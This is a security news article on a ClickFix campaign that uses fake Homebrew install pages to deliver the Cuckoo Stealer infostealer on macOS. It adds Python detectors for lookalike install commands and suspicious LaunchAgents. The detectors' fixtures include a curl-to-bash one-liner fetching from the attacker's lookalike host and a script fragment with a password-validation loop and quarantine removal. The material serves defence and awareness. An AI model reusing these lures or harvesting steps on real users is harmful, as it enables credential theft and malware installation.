Rather than exploiting a software flaw, a recent macOS malware campaign abuses a developer habit: copying an installation command from a web page straight into Terminal. Security researchers at Hunt.io have uncovered a ClickFix campaign that impersonates the well-known Homebrew package manager's installer in order to deliver an infostealer tracked as Cuckoo Stealer.
ClickFix is a social-engineering technique. Instead of breaching macOS directly, the attacker tricks the user into running the malicious command themselves. Victims land on a convincing copy of a software download page that shows an installation command next to a handy "Copy" button. Once that command is pasted into Terminal it runs with the user's full privileges, and no exploit was needed.
In this case the attackers registered typosquatted domains that closely resemble the official Homebrew website. The page displays what looks like the standard installation command. The genuine one fetches Homebrew's install script from the project's GitHub repository (served from raw.githubusercontent.com); the malicious copy keeps the same shape and flags but points the URL at a lookalike host under the attacker's control, so the script it pulls down is theirs.
Only a few characters separate the two, which is easy to miss at a glance. The technique is particularly effective against developers and administrators, who routinely install tools by piping curl into bash.
Familiar flags such as -fsSL (fail on HTTP errors, silent, show errors, follow redirects) make the command look genuine.
(Figure: Hunt.io registration details for homabrews[.]org, registered through NameCheap and rated high-risk. Source: Hunt.io)
Once the script runs, it enters a hidden authentication loop: it repeatedly prompts the user for a password and validates each attempt against macOS Directory Services (dscl . -authonly) until a correct one is entered.
Because the prompt looks exactly like an ordinary sudo password request, victims rarely suspect anything.
With a working password in hand, the script silently launches the second-stage payload, Cuckoo Stealer. Rather than a single phishing page, the researchers found several related domains on shared hosting infrastructure, which points to an organized operation, and infrastructure searches turned up dozens of similar ClickFix pages aimed at macOS, a sign that this delivery method is spreading.
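The two checks a practitioner would want before pasting such a command are (1) does every URL in it point at a host the real installer uses, and (2) if the script is fetched and read first, does it contain the behaviours described above (a dscl authonly password loop, quarantine-attribute removal, LaunchAgent writes). The following is an added example, not code from the article or from Hunt.io; it uses the real Homebrew one-liner, a lookalike built on the raw.homabrews[.]org host the article names (the path on that host is an assumption), and a constructed script fragment that mimics the reported behaviour.

```python
import re
from urllib.parse import urlparse

# Hosts the genuine Homebrew installer actually uses: the project site and the
# GitHub raw host that serves install.sh.
KNOWN_GOOD_HOSTS = {"brew.sh", "github.com", "raw.githubusercontent.com"}
# Brand names a typosquatter is likely to imitate in a lookalike host.
BRAND_TOKENS = ("homebrew", "brew", "github", "githubusercontent")

URL_RE = re.compile(r"https?://[^\s\"')]+")

# Behaviours the article attributes to the fake installer, as grep-style patterns.
RED_FLAGS = [
    ("password-validation loop", re.compile(r"dscl\s+\.\s+-authonly")),
    ("quarantine attribute removal", re.compile(r"xattr\b.*(com\.apple\.quarantine|\s-c\b)")),
    ("LaunchAgent persistence", re.compile(r"Library/LaunchAgents")),
    ("decoded payload", re.compile(r"base64\s+(-d|-D|--decode)")),
    ("GUI password prompt", re.compile(r"osascript.*(password|hidden answer)")),
]


def levenshtein(a, b):
    """Plain edit distance; inputs are host labels, so O(len(a)*len(b)) is fine."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike_reason(host):
    """Return why a label of host resembles a brand token, or None."""
    for label in host.lower().split(".")[:-1]:  # ignore the TLD
        for token in BRAND_TOKENS:
            d = levenshtein(label, token)
            # Tolerate about one edit per four characters, so "homabrews" ~ "homebrew"
            # is caught while a short label such as "raw" is not mistaken for "brew".
            if d <= max(1, len(token) // 4):
                return f"lookalike of '{token}' (edit distance {d})"
    return None


def check_command(cmd):
    """Return (host, reason) for every URL in cmd whose host is not on the allowlist."""
    findings = []
    for url in URL_RE.findall(cmd):
        host = urlparse(url).hostname or ""
        if host in KNOWN_GOOD_HOSTS:
            continue
        findings.append((host, lookalike_reason(host) or "host not on the install allowlist"))
    return findings


def scan_script(text):
    """Return (line_no, flag, line) for each line of a fetched script that matches a red flag."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        for name, pattern in RED_FLAGS:
            if pattern.search(line):
                findings.append((n, name, line.strip()))
        if check_command(line):
            findings.append((n, "fetch from untrusted host", line.strip()))
    return findings


# The real Homebrew one-liner, and a constructed lookalike whose path merely mirrors it
# (the article names raw.homabrews[.]org; the exact path served there is an assumption).
GENUINE = '/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"'
LOOKALIKE = '/bin/bash -c "$(curl -fsSL https://raw.homabrews.org/Homebrew/install/HEAD/install.sh)"'

# Constructed script fragment that mimics the behaviour described in the article.
SAMPLE_SCRIPT = """#!/bin/bash
echo "==> Checking for sudo access (which may request your password)..."
while true; do
  read -r -s -p "Password: " pw; echo
  dscl . -authonly "$USER" "$pw" >/dev/null 2>&1 && break
  echo "Sorry, try again."
done
curl -fsSL https://raw.homabrews.org/update -o /tmp/.u
xattr -d com.apple.quarantine /tmp/.u
"""

if __name__ == "__main__":
    for cmd in (GENUINE, LOOKALIKE):
        print(cmd, "->", check_command(cmd) or "OK")
    for n, flag, line in scan_script(SAMPLE_SCRIPT):
        print(f"line {n}: {flag}: {line}")
```

The allowlist check is the one that matters; the edit-distance heuristic only explains why an unknown host is suspicious. For a real install, fetch the script to a file with curl -o, run scan_script over it, and only then execute it.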
Capabilities of Cuckoo Stealer

Cuckoo Stealer is more than a simple credential grabber: it pairs a full-featured macOS infostealer with remote-access trojan (RAT) functionality. On infection it establishes persistence through a LaunchAgent named com.homebrew.brewupdater.plist, so the malware starts automatically each time the user logs in, and it strips the com.apple.quarantine extended attribute from its files so that Gatekeeper raises no warning.
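A LaunchAgent named after Homebrew is worth checking for, because brew services writes its agents as homebrew.mxcl.<formula> and nothing else in Homebrew uses a com.homebrew.* label. The following audit is an added example, not code from the article or from Hunt.io: it parses every plist in a LaunchAgents directory with plistlib and flags the reported label, labels that borrow the Homebrew name outside the brew services convention, inline shell commands, and executables in temporary or user-writable paths. The program path in the constructed sample is an assumption; the article does not give it.

```python
import os
import plistlib
import tempfile

# Label named in the Hunt.io report as the Cuckoo Stealer persistence artifact.
IOC_LABELS = {"com.homebrew.brewupdater"}
# Locations a legitimate per-user agent should rarely execute from.
SUSPICIOUS_PREFIXES = ("/tmp/", "/private/tmp/", "/var/folders/", "/Users/Shared/")
SHELLS = {"/bin/sh", "/bin/bash", "/bin/zsh"}


def audit_launch_agent(path):
    """Parse one LaunchAgent plist and return the reasons it looks suspicious (empty if none)."""
    try:
        with open(path, "rb") as fh:
            plist = plistlib.load(fh)
    except (OSError, plistlib.InvalidFileException, ValueError) as exc:
        return [f"unparseable plist: {exc}"]
    if not isinstance(plist, dict):
        return ["plist root is not a dictionary"]
    reasons = []
    label = str(plist.get("Label", ""))
    args = [str(a) for a in plist.get("ProgramArguments") or []]
    program = str(plist.get("Program") or (args[0] if args else ""))
    if label in IOC_LABELS:
        reasons.append(f"label {label} is a reported Cuckoo Stealer indicator")
    elif "brew" in label.lower() and not label.startswith("homebrew.mxcl."):
        # brew services writes homebrew.mxcl.<formula>; any other use of the name is impersonation.
        reasons.append(f"label {label} imitates Homebrew but is not a brew services agent")
    for item in [program] + args:
        if item.startswith(SUSPICIOUS_PREFIXES):
            reasons.append(f"references {item} in a temporary or user-writable location")
            break
    if program in SHELLS and "-c" in args:
        reasons.append("runs an inline shell command via " + program)
    if plist.get("RunAtLoad") and reasons:
        reasons.append("RunAtLoad is set, so it starts at every login")
    return reasons


def audit_launch_agents(directory):
    """Audit every .plist in directory; returns {filename: [reasons]} for suspicious ones only."""
    findings = {}
    for name in sorted(os.listdir(directory)):
        if name.endswith(".plist"):
            reasons = audit_launch_agent(os.path.join(directory, name))
            if reasons:
                findings[name] = reasons
    return findings


def write_sample_agents(directory):
    """Write two constructed plists: one shaped like the reported artifact, one a normal brew services agent."""
    samples = {
        "com.homebrew.brewupdater.plist": {
            "Label": "com.homebrew.brewupdater",
            # The program path is an assumption for the example; the report on this page does not give it.
            "ProgramArguments": ["/bin/sh", "-c", "/Users/Shared/.brewupdater"],
            "RunAtLoad": True,
            "KeepAlive": True,
        },
        "homebrew.mxcl.postgresql@16.plist": {
            "Label": "homebrew.mxcl.postgresql@16",
            "ProgramArguments": ["/opt/homebrew/opt/postgresql@16/bin/postgres",
                                 "-D", "/opt/homebrew/var/postgresql@16"],
            "RunAtLoad": True,
            "KeepAlive": True,
        },
    }
    for name, plist in samples.items():
        with open(os.path.join(directory, name), "wb") as fh:
            plistlib.dump(plist, fh)


def demo():
    """Run the audit on the constructed samples in a scratch directory."""
    with tempfile.TemporaryDirectory() as tmp:
        write_sample_agents(tmp)
        return audit_launch_agents(tmp)


if __name__ == "__main__":
    agents_dir = os.path.expanduser("~/Library/LaunchAgents")
    results = audit_launch_agents(agents_dir) if os.path.isdir(agents_dir) else demo()
    for name, reasons in results.items():
        print(name)
        for r in reasons:
            print("  -", r)
```

On a Mac, run it as-is to audit ~/Library/LaunchAgents; elsewhere it falls back to the constructed samples. For any hit, also inspect the referenced binary with xattr -l to confirm whether com.apple.quarantine has been stripped, as the article describes.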
(Figure: Hunt.io's phishing URL detection listing several flagged URLs, including the raw. subdomain of homabrews[.]org. Source: Hunt.io)
For command and control, the malware talks to its server over HTTPS, using an X25519 key exchange to encrypt the traffic, which gives the operators remote control of the device. Its data theft is broad.
The malware targets:
- browser cookies, session tokens, and saved passwords
- macOS Keychain credentials
- the Apple Notes database
- Telegram and Discord sessions
- FTP and VPN configurations
- screenshots and desktop documents
- more than 20 cryptocurrency wallets
It can also browse the file system, run shell commands, reboot the machine, and delete itself to remove evidence. The researchers also observed a regional filter: systems whose locale is set to certain CIS languages are skipped, a practice common among organized cybercrime groups.
The campaign underlines a crucial security lesson: human behavior is an increasingly important factor in modern attacks.
(Figure: Hunt.io showing several malicious domains hosted on shared infrastructure at 5.255.123[.]244. Source: Hunt.io)
Technically, no macOS protection was "bypassed": the page looked authentic, the command looked authentic, and the user unwittingly consented to the infection.

MITRE ATT&CK mapping:

Tactic               Technique    Description
Initial Access       T1189        Drive-by compromise via fake websites
Execution            T1059.004    Unix shell (curl piped to bash)
Persistence          T1543.001    Launch Agent creation
Defense Evasion      T1027        Obfuscated strings
Credential Access    T1555.001    Keychain theft
Collection           T1113        Screen capture
Command and Control  T1573.002    Encrypted channel (asymmetric cryptography)

As attackers shift toward social-engineering techniques like ClickFix, Hunt.io advises organizations to treat copy-paste commands from websites as potential threats and to train users to verify the source before running anything in Terminal.